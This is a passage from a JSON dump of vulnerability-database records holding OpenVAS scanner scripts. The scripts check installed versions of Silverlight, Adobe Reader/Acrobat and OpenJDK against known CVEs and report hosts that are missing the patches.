modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted file.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Silverlight versions 4 and 5\";\ntag_insight = \"The flaws are due to an error exists when parsing TrueType fonts.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/MS12-034\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS12-034.\";\n\nif(description)\n{\n script_id(902678);\n script_version(\"$Revision: 5940 $\");\n script_cve_id(\"CVE-2011-3402\", \"CVE-2012-0159\");\n script_bugtraq_id(50462, 53335);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-12 11:02:05 +0200 (Wed, 12 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-14 13:06:50 +0530 (Mon, 14 May 2012)\");\n script_name(\"Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49121\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2681578\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2690729\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1027048\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-034\");\n\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gb_ms_silverlight_detect_macosx.nasl\");\n script_require_keys(\"MS/Silverlight/MacOSX/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nslightVer = \"\";\n\n## Get the version from KB\nslightVer = get_kb_item(\"MS/Silverlight/MacOSX/Ver\");\nif(!slightVer){\n exit(0);\n}\n\n## Check for Silverlight 4 and 5\nif(version_in_range(version: slightVer, test_version:\"4.0\", test_version2:\"4.1.10328\")||\n version_in_range(version: slightVer, test_version:\"5.0\", test_version2:\"5.1.10410\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-10T19:58:22", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-034.", "cvss3": {}, "published": "2012-05-14T00:00:00", "type": "openvas", "title": "Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402", "CVE-2012-0159"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310902678", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902678", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902678\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_cve_id(\"CVE-2011-3402\", \"CVE-2012-0159\");\n script_bugtraq_id(50462, 53335);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-05-14 13:06:50 +0530 (Mon, 14 May 2012)\");\n script_name(\"Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2681578\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2690729\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027048\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-034\");\n\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gb_ms_silverlight_detect_macosx.nasl\");\n script_mandatory_keys(\"MS/Silverlight/MacOSX/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted file.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Silverlight versions 4 and 5.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to an error exists when parsing TrueType fonts.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS12-034.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nslightVer = get_kb_item(\"MS/Silverlight/MacOSX/Ver\");\nif(!slightVer){\n exit(0);\n}\n\nif(version_in_range(version: slightVer, test_version:\"4.0\", test_version2:\"4.1.10328\")||\n version_in_range(version: slightVer, test_version:\"5.0\", test_version2:\"5.1.10410\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:12", "description": "This host is installed with Adobe Reader and is prone to remote code\nexecution vulnerability.", "cvss3": {}, "published": "2010-02-26T00:00:00", "type": "openvas", "title": "Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310902129", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902129", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_adobe_prdts_code_exec_vuln_feb10_lin.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902129\");\n script_version(\"$Revision: 12653 $\");\n script_cve_id(\"CVE-2010-0188\", \"CVE-2010-0186\");\n script_bugtraq_id(38195, 38198);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-26 10:13:54 +0100 (Fri, 26 Feb 2010)\");\n script_name(\"Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to remote code\nexecution vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is caused by a memory corruption error in the 'authplay.dll' module\nwhen processing malformed Flash data within a PDF document and some unspecified\nerror.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary code by tricking\na user into opening a PDF file embedding a malicious Flash animation and bypass\nintended sandbox restrictions allowing cross-domain requests.\");\n script_tag(name:\"affected\", value:\"Adobe Reader version 8.x before 8.2.1 and 9.x before 9.3.1 on Linux.\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.3.1 or 8.2.1 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/56297\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0399\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2010/Feb/1023601.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-07.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:readerVer, test_version:\"8.2.1\") ||\n version_in_range(version:readerVer, test_version:\"9.0\", test_version2:\"9.3.0\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-02T15:55:12", "description": "This host is installed with Adobe Reader/Acrobat and is prone to remote code\n execution vulnerability.", "cvss3": {}, "published": "2010-02-26T00:00:00", "type": "openvas", "title": "Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2020-05-28T00:00:00", "id": "OPENVAS:1361412562310902128", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902128", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902128\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_cve_id(\"CVE-2010-0188\", \"CVE-2010-0186\");\n script_bugtraq_id(38195, 38198);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-02-26 10:13:54 +0100 (Fri, 26 Feb 2010)\");\n script_name(\"Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader/Acrobat and is prone to remote code\n execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw is caused by a memory corruption error in the 'authplay.dll' module\n when processing malformed Flash data within a PDF document and some unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary code by tricking\n a user into opening a PDF file embedding a malicious Flash animation and bypass\n intended sandbox restrictions allowing cross-domain requests.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 8.x before 8.2.1 and 9.x before 9.3.1\n\n Adobe Acrobat version 8.x before 8.2.1 and 9.x before 9.3.1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader/Acrobat version 9.3.1 or 8.2.1 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/56297\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0399\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2010/Feb/1023601.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-07.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:acrobat_reader\",\n \"cpe:/a:adobe:acrobat\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"8.2.1\") ||\n version_in_range(version:vers, test_version:\"9.0\", test_version2:\"9.3.0\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"9.3.1 or 8.2.1\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-02T15:47:04", "description": "This host is installed with Adobe Reader/Acrobat and is prone to remote code\n execution vulnerability.", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "openvas", "title": "Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2020-05-28T00:00:00", "id": "OPENVAS:1361412562310804267", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804267", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804267\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_cve_id(\"CVE-2010-0188\", \"CVE-2010-0186\");\n script_bugtraq_id(38195, 38198);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-16 15:25:45 +0530 (Wed, 16 Apr 2014)\");\n script_name(\"Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader/Acrobat and is prone to remote code\n execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw is caused by a memory corruption error in the 'authplay.dll' module\n when processing malformed Flash data within a PDF document and some unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary code by tricking\n a user into opening a PDF file embedding a malicious Flash animation and bypass\n intended sandbox restrictions allowing cross-domain requests.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 8.x before 8.2.1 and 9.x before 9.3.1 on Mac OS X.\n\n Adobe Acrobat version 8.x before 8.2.1 and 9.x before 9.3.1 on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader/Acrobat version 9.3.1 or 8.2.1 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/56297\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0399\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2010/Feb/1023601.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-07.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader/MacOSX/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:acrobat_reader\",\n \"cpe:/a:adobe:acrobat\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"8.2.1\") ||\n version_in_range(version:vers, test_version:\"9.0\", test_version2:\"9.3.0\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"9.3.1 or 8.2.1\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-24T11:10:02", "description": "Check for the Version of java", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-01-24T00:00:00", "id": "OPENVAS:881564", "href": "http://plugins.openvas.org/nasl.php?oid=881564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n \n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n \n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-January/019204.html\");\n script_id(881564);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:39:47 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:51:31", "description": "Check for the Version of java-1.7.0-openjdk", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:870889", "href": "http://plugins.openvas.org/nasl.php?oid=870889", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java-1.7.0-openjdk on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-January/msg00036.html\");\n script_id(870889);\n script_version(\"$Revision: 6687 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:46:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:36:09 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0165-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\");\n\n script_summary(\"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", 